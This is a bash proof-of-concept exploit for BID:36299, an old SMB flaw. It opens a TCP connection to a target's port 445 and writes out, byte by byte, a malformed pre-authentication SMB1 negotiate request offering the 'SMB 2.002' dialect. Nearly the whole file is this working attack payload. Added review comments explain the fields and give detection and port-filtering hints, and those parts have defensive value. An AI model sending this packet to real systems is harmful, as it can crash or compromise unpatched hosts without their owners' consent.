#!/bin/bash
#
# Attack for BID:36299, now in standalone bash shell form.
# Discovered by Laurent Gaffie http://g-laurent.blogspot.com, from whom
# the payload is ripped off.
#
# I)ruid 2009.09

# Positional arguments: <host> is required; <port> is optional and falls
# back to 445 when it is omitted or empty. Neither value is validated here.
if (( $# == 0 )); then
	echo "Usage: $0 <host> [<port>]"
	exit 1
fi
host=$1
port=${2:-445}

# Open a read/write TCP connection to $host:$port on file descriptor 3 via
# bash's /dev/tcp pseudo-device.
# NOTE(review): $host and $port are expanded unquoted and the exit status of
# this exec is not checked, so nothing below confirms a connection exists.
exec 3<>/dev/tcp/$host/$port

# Banner written to stdout (not to fd 3). It is printed before any byte is
# sent, so it says nothing about whether the request was delivered.
printf "Kaboomz\r\n"

# The writes below form a single SMB1 negotiate request. No session setup or
# credentials are sent, so the request is pre-authentication.
#
# NetBIOS session header: message type 0x00, length 0x000090 (144), which
# matches the 144 bytes written by the remaining printf calls.
printf "\x00\x00\x00\x90" >&3
# SMB1 header magic: 0xFF 'S' 'M' 'B'.
printf "\xff\x53\x4d\x42" >&3
# Command byte 0x72 (negotiate), followed by the first three status bytes.
printf "\x72\x00\x00\x00" >&3
# Last status byte, flags 0x18, then the two flags2 bytes 0x53 0xc8.
printf "\x00\x18\x53\xc8" >&3
# Two-byte field at header offset 12 (PID-high in the SMB1 header layout),
# set to 0x00 0x26. NOTE(review): this field is normally zero in a negotiate
# request; presumably it is the malformed field BID:36299 concerns - confirm
# against the advisory. For detection, a negotiate request that offers the
# "SMB 2.002" dialect with a non-zero value here is what sets this packet
# apart from ordinary client traffic.
printf "\x00\x26" >&3
# Eight signature bytes and two reserved bytes (all zero), then 0xffff and
# 0xfffe in the tree-ID and process-ID positions.
printf "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe" >&3
# User ID 0x0000, multiplex ID 0x0000, word count 0x00, byte count 0x006d
# (109), then the start of the dialect list. Each dialect is a 0x02 marker
# byte followed by a NUL-terminated ASCII string; the seven entries are:
#   "PC NETWORK PROGRAM 1.0", "LANMAN1.0", "Windows for Workgroups 3.1a",
#   "LM1.2X002", "LANMAN2.1", "NT LM 0.12", "SMB 2.002"
# Together they occupy exactly the 109 bytes announced by the byte count.
printf "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54" >&3
printf "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31" >&3
printf "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" >&3
printf "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" >&3
printf "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" >&3
printf "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" >&3
printf "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" >&3
printf "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" >&3
printf "\x30\x30\x32\x00" >&3

# Close fd 3. The script never reads from the socket, so it has no view of
# how (or whether) the target answered. Because the request needs only
# reachability of the SMB port, filtering inbound TCP 445 from untrusted
# networks removes the path this script relies on.
exec 3>&-


